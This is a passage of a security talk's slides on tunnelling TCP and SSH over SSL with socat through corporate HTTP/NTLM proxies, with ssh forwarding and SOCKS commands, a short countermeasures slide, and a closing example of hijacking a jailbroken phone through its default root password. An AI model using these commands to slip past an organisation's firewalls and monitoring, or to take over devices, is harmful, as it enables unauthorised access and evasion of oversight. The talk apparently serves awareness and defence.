  • 16. Creating an end-to-end SSL tunnel  On the attacking machine, SOCAT relays input over the SSL connection #socat TCP4-listen:6666 OPENSSL:my.server.com:443  The SSL tunnel is terminated on the attacker’s server and forwarded to a listening TCP socket #socat OPENSSL-LISTEN:443,cert=path_to_cert TCP4:127.0.0.1:22
  • 17. Tunneling tcp:6666 tcp:22 SOCAT SOCAT tcp:1234 tcp:6666 tcp:22 ssl SOCAT SOCAT ssl:443
  • 18. Tunneling TCP over SSL and Proxy  When SOCAT_1 connects to SOCAT_2, SOCAT_2 will initiate a CONNECT method to the proxy allowing a SSL connection to be negotiated between SOCAT_1 and SOCAT_3 tcp:6666 tcp:22 ssl SOCAT_1 SOCAT_2 HTTP_PROXY SOCAT_3 ssl:4444 tcp:8080 ssl:443 #socat TCP4-listen:6666 OPENSSL:localhost:4444 #socat TCP4-listen:4444 PROXY:proxy.company.com:my.server.com:443 #socat OPENSSL-LISTEN:443,cert=path_to_cert TCP4:127.0.0.1:22
  • 19. Handling NTLM authentication  NTLM authentication  An additional NTLM Authorization Proxy Server might be inserted to authenticate to the http_proxy, if required. tcp:6666 tcp:22 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool ssl
  • 20. Any TCP connection can be mapped in this way across firewalls, proxies, IDS ….. and of course, securely and almost invisible !!
  • 21. Introducing SSH over SSL  SSH can be tunneled through the established SSL tunnel # ssh username@127.0.0.1 –p 6666 SSH SSH CLIENT SERVER tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
  • 22. SSH options -L  Option -L # ssh username@127.0.0.1 –p 6666 –L 3333:127.0.0.1:2222  Data received on the listening client socket is forwarded over the SSH connection (wrapped into the SSL tunnel) to SSH server.  The SSH server forwards the data over a new TCP connection to destination specified  Localhost  Any IP address !!
  • 23. SSL SSH tcp:3333 tcp:2222 SSH SERVER SSH CLIENT tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
  • 24. SSH options -R  Option -R # ssh username@127.0.0.1 –p 6666 –R 3333:127.0.0.1:2222  Reverse port forwarding  port 3333 accepts incoming connections on the SSH server!  Accepted connections are forwarded through the SSH connection (reverse direction) to the SSH client.  SSH client originates and establishes a connection to 127.0.0.1:2222  Localhost  Any INTERNAL IP ADDRESS can be specified!!!
  • 25. SSL SSH tcp:2222 tcp:3333 SSH SERVER SSH CLIENT tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
  • 26. SSH options -D  Option -D ssh username@127.0.0.1 –p 6666 –D 1080  SOCKS proxy  port 1080 accepts incoming connections on the SSH client and forwards the request to the SSH server acting as a socks proxy.
  • 27. SOCKS ENABLED CLIENT tcp:1080 SSH SERVER SSH CLIENT tcp:6666 tcp:22 Ntlm- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 Tcp:8080 proxy tool SSL
  • 28. Game over ?!? SOCKS SOCKS ENABLED ENABLED CLIENT CLIENT tcp:1080 tcp:1080 tcp:1080 SSH SERVER SSH CLIENT SSH SERVER SSH CLIENT tcp:1080 tcp:6666 tcp:22 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool ssl
  • 29. Additional tricks  Use non of non-standard ports  “optimizing” SSL  X.509 client certificates  “strong” ciphers to protect SSL tunnels being arp spoofed …  Fine tuning SOCAT options  fork, su, proxyport …  Fragmentation (still does the trick )
  • 30. Feasibility?  BackTrack 3 has everything on board  Runs from USB, CDROM, Virtual desktops …  Similar tools are available for windows platform with limited privileges  Will it work from your network?  99% chance?  Do I really need the most complicated scenario?  No direct TCP connections to the outside?
  • 31. What can I do about it?  Very restrictive desktop policy  No USB support  No boot from CDROM/USB  No possible way to install software  Bios passwords  Baseline traffic  Effectiveness?  Advanced forward proxy technology  Feasibility and impact?  Other solutions?
  • 32. Things to think about  Network firewalls CANNOT help you …  IDS/IPS will not help …  Content Security proxies will not help …  What about outbound(SSL)VPN connections?  Very dangerous in this respect !  Network layer functionality  OPENVPN can be tunneled!  Very rich feature set  Bridging networks
  • 34. Snow White was almost killed by an apple …  Imagine a “ziphoned” MP3 player enabled phone on a public wireless network and xxradar being bored … c:pscp root@phoneip:/etc/sshd_config ./. c:write sshd_config change accordingly ;-) c:pscp ./sshd_config root@phoneip:/etc/sshd_config ... SSH into the phone and relaunch SSH or reboot ... c:plink root@phoneip -D 1080  Any idea what this means ???  No? you better turn of your phone then   Oh yes I forgot, there is a standard password on that “ziphoned” MP3 player enabled phone!
  • 35. Thank you for listening ! Philippe Bogaerts philippe.bogaerts at radarhack.com http://www.radarhack.com http://www.radarsec.com Reviewed by Kris Boulez (Ascure)